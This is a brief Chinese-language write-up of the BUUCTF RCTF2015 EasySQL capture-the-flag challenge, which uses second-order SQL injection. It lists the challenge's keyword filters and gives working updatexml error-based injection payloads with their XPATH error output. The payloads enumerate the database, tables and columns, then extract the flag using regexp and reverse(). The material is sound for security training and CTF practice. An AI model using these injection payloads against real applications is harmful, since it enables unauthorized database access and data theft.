buuctf-[RCTF2015]EasySQL-阿里云开发者社区

buuctf-[RCTF2015]EasySQL

2023-11-20 76

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： buuctf-[RCTF2015]EasySQL

Fuzz  测试
过滤：
  and  insert  ascii  substr  left rigth  sleep  floor  < like /**/  %20
思路：    注册带有危险符号的用户，登录之后修改密码，就能达到二次注入的效果
爆破：   admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1
    用户: admin"or(updatexml('~',concat('~',database(),'~'),'~'))or"1   
  XPATH syntax error: '~web_sqli~'
   表:  admin"or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),'~'),'~'))or"1
  XPATH syntax error: '~article,flag,users~'
列： admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),'~'),'~'))or"1
  admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),'~'),'~'))or"1
  XPATH syntax error: '~flag~'
  name,pwd,email,real_flag_1s_her
  ereh_s1_galf_laer,liame,dwp,ema
flag       
  admin"or(updatexml('~',concat('~',(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
  admin"or(updatexml('~',concat('~',(select(REVERSE(GROUP_CONCAT(real_flag_1s_here)))from(web_sqli.users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1

上面是自己研究的一些思路和姿势，以及写题的流程。

题目的考点是二次注入，报错注入，sql正则函数，reverse()函数。

文章标签：

SQL

buuctf-[RCTF2015]EasySQL

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

buuctf-[RCTF2015]EasySQL

热门文章

最新文章

相关电子书